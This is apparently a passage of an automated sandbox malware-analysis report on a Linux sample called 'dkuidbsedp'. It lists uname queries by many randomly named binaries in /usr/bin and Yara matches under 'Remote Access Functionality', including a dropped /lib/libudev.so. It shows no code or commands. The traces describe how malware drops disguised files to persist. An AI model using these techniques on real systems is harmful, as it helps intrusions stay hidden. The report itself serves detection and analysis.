              Source: /usr/bin/thzryslebl (PID: 10547)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thzryslebl (PID: 10553)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thzryslebl (PID: 10561)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/sunvkgnszw (PID: 10596)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/sunvkgnszw (PID: 10599)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/sunvkgnszw (PID: 10604)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/sunvkgnszw (PID: 10608)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/sunvkgnszw (PID: 10614)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yclsxhkbli (PID: 10651)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yclsxhkbli (PID: 10654)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yclsxhkbli (PID: 10659)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yclsxhkbli (PID: 10665)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/yclsxhkbli (PID: 10672)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nvlkgshfzs (PID: 10706)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nvlkgshfzs (PID: 10708)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nvlkgshfzs (PID: 10711)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nvlkgshfzs (PID: 10714)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nvlkgshfzs (PID: 10718)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wgerzwaeqg (PID: 10761)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wgerzwaeqg (PID: 10764)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wgerzwaeqg (PID: 10767)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wgerzwaeqg (PID: 10772)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wgerzwaeqg (PID: 10777)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chvtxqzhiw (PID: 10816)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chvtxqzhiw (PID: 10819)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chvtxqzhiw (PID: 10824)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chvtxqzhiw (PID: 10829)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/chvtxqzhiw (PID: 10834)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwevskbjgs (PID: 10871)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwevskbjgs (PID: 10874)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwevskbjgs (PID: 10877)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwevskbjgs (PID: 10882)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwevskbjgs (PID: 10889)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kztofeuxtk (PID: 10926)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kztofeuxtk (PID: 10928)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kztofeuxtk (PID: 10931)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kztofeuxtk (PID: 10933)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/kztofeuxtk (PID: 10938)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tihvbqlbyh (PID: 10981)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tihvbqlbyh (PID: 10984)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tihvbqlbyh (PID: 10988)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tihvbqlbyh (PID: 10995)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tihvbqlbyh (PID: 11004)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/evsgasjgju (PID: 11036)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/evsgasjgju (PID: 11039)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/evsgasjgju (PID: 11043)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/evsgasjgju (PID: 11050)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/evsgasjgju (PID: 11055)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jyfcwmvcim (PID: 11101)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jyfcwmvcim (PID: 11103)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jyfcwmvcim (PID: 11105)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jyfcwmvcim (PID: 11109)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/jyfcwmvcim (PID: 11114)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nwaorjvecz (PID: 11156)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nwaorjvecz (PID: 11158)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nwaorjvecz (PID: 11160)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nwaorjvecz (PID: 11163)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/nwaorjvecz (PID: 11167)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cqsoclzfrt (PID: 11211)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cqsoclzfrt (PID: 11213)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cqsoclzfrt (PID: 11215)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cqsoclzfrt (PID: 11218)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cqsoclzfrt (PID: 11222)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/udrzmjfbgf (PID: 11268)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/udrzmjfbgf (PID: 11270)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/udrzmjfbgf (PID: 11272)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/udrzmjfbgf (PID: 11274)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/udrzmjfbgf (PID: 11278)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwgryggbpq (PID: 11323)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwgryggbpq (PID: 11325)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwgryggbpq (PID: 11327)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwgryggbpq (PID: 11329)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwgryggbpq (PID: 11331)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thqvayvyih (PID: 11378)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thqvayvyih (PID: 11380)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thqvayvyih (PID: 11382)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thqvayvyih (PID: 11384)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/thqvayvyih (PID: 11386)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fcpzadqmpt (PID: 11433)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fcpzadqmpt (PID: 11435)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fcpzadqmpt (PID: 11437)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fcpzadqmpt (PID: 11439)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/fcpzadqmpt (PID: 11441)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ibtfyvoofm (PID: 11488)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ibtfyvoofm (PID: 11490)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ibtfyvoofm (PID: 11492)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ibtfyvoofm (PID: 11494)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ibtfyvoofm (PID: 11497)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tlayyibcia (PID: 11543)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tlayyibcia (PID: 11545)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tlayyibcia (PID: 11547)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tlayyibcia (PID: 11550)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/tlayyibcia (PID: 11553)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/dzlsbdiinr (PID: 11598)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/dzlsbdiinr (PID: 11600)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/dzlsbdiinr (PID: 11602)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/dzlsbdiinr (PID: 11604)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/dzlsbdiinr (PID: 11607)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwdfhkhfeq (PID: 11653)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwdfhkhfeq (PID: 11655)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwdfhkhfeq (PID: 11657)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwdfhkhfeq (PID: 11660)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qwdfhkhfeq (PID: 11664)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ldaqsdrmbu (PID: 11708)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ldaqsdrmbu (PID: 11710)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ldaqsdrmbu (PID: 11712)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ldaqsdrmbu (PID: 11714)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ldaqsdrmbu (PID: 11717)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wuipuaslsy (PID: 11763)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wuipuaslsy (PID: 11765)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wuipuaslsy (PID: 11767)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wuipuaslsy (PID: 11769)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/wuipuaslsy (PID: 11772)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uvaewfcsxa (PID: 11818)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uvaewfcsxa (PID: 11820)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uvaewfcsxa (PID: 11822)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uvaewfcsxa (PID: 11825)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uvaewfcsxa (PID: 11827)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bbynnggifo (PID: 11873)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bbynnggifo (PID: 11875)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bbynnggifo (PID: 11877)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bbynnggifo (PID: 11880)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/bbynnggifo (PID: 11884)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/lcbdpulcrs (PID: 11930)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/lcbdpulcrs (PID: 11932)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/lcbdpulcrs (PID: 11934)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/lcbdpulcrs (PID: 11938)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/lcbdpulcrs (PID: 11941)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/vrbpjcuukk (PID: 11985)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/vrbpjcuukk (PID: 11987)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/vrbpjcuukk (PID: 11989)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/vrbpjcuukk (PID: 11992)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/vrbpjcuukk (PID: 11996)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/potliirubi (PID: 12040)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/potliirubi (PID: 12042)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/potliirubi (PID: 12044)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/potliirubi (PID: 12047)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/potliirubi (PID: 12051)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qvavyybczk (PID: 12095)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qvavyybczk (PID: 12097)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qvavyybczk (PID: 12099)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qvavyybczk (PID: 12102)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/qvavyybczk (PID: 12104)Queries kernel information via 'uname': Jump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
              Source: .depend.boot.18.drBinary or memory string: qemu-kvm: mountkernfs.sh udev
              Source: .depend.boot.18.drBinary or memory string: TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dkuidbsedp, type: SAMPLE
              Source: Yara matchFile source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9445, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9450, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9453, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9457, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9546, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9557, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9579, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9590, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9601, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9623, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9634, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9667, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9678, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9689, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9700, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9711, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9722, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9733, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9744, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9755, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9766, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9777, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9788, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9799, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9810, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9821, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9832, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9843, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9854, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9865, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9876, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9887, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9898, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9909, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9931, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9942, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9953, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9975, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 9999, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10010, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10021, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10043, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10054, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10065, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10076, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10087, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10098, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10109, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10120, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10131, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10142, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10153, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10175, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10186, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10197, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dkuidbsedp PID: 10219, type: MEMORYSTR
              Source: Yara matchFile source: /usr/bin/zetazkptwu, type: DROPPED
              Source: Yara matchFile source: /usr/bin/tudlcvpgbc, type: DROPPED
              Source: Yara matchFile source: /usr/bin/qjfxtxsijs, type: DROPPED
              Source: Yara matchFile source: /lib/libudev.so, type: DROPPED
